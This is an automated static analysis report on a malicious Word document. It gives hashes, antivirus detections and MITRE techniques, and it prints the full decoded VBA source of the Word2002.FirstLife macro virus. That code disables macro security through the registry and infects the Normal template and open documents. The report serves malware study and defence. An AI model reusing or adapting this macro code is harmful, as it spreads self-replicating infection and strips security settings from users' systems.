Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 ffb094cc2cc19ac6…

MALICIOUS

Office (OLE)

31.0 KB Created: 2001-03-21 18:38:00 Authoring application: Microsoft Word 10.0 First seen: 2012-06-14
MD5: 3470a3390e3dc88c135c5d005509484f SHA-1: f916f21283552633635347ef479560fe5a2820b7 SHA-256: ffb094cc2cc19ac654cebfeba9d8f3dc12cbb735df68c9ee50b1cea8f2ee0cb3
180 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample contains VBA macros, specifically a Document_Open macro, which is a common technique for executing malicious code upon opening a document. The script attempts to disable macro security and inject code into the Normal template, indicating an attempt at persistence. The ClamAV detections 'Win.Trojan.Psycho-3' and 'Win.Trojan.wmvg-1' further support its malicious nature.

Heuristics 3

  • ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Psycho-3
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2219 bytes
SHA-256: c8a371e644501e213166f08cb52eac9816b0624be6fd667ef8ca8a1654c9a528
Detection
ClamAV: Win.Trojan.wmvg-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
On Error Resume Next
'Word2002.FirstLife
Options.ConfirmConversions = (1 - 1)
Options.SaveNormalPrompt = (1 - 1)
If Application.Version = "10.0" Then
MsgBox "10"
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
Application.AutomationSecurity = msoAutomationSecurityForceDisable
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security", "Level") = 1&
End If
End If
If Application.Version = "9.0" Then
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
CommandBars("Tools").Controls("Macro").Enabled = False
End If
End If
TD = ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, ThisDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)
If NormalTemplate.VBProject.VBComponents(1).CodeModule.Lines(3, 1) <> "'Word2002.FirstLife" Then
Set NT = NormalTemplate.VBProject.VBComponents.Item(1).CodeModule
NT.DeleteLines 1, NT.CountOfLines
NT.AddFromString TD
NT.ReplaceLine 1, "Sub Document_Close()"
End If
If ActiveDocument.VBProject.VBComponents(1).CodeModule.Lines(3, 1) <> "'Word2002.FirstLife" Then
Set VA = ActiveDocument.VBProject.VBComponents.Item(1).CodeModule
VA.DeleteLines 1, VA.CountOfLines
VA.AddFromString TD
VA.ReplaceLine 1, "Sub Document_Open()"
End If
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End Sub

' Word2002.FirstLife by ULTRAS [MATRiX]
' The first virus for Word 2002!
' Date: mar 21th 2001
' MATRiX TeAm:
' ANAKToS, Del_Armg0, NBK, mort, SnakeByte, pointbat, ULTRAS
' new technology, new vx power...

Open this report in the interactive analyzer, or submit your own file for analysis.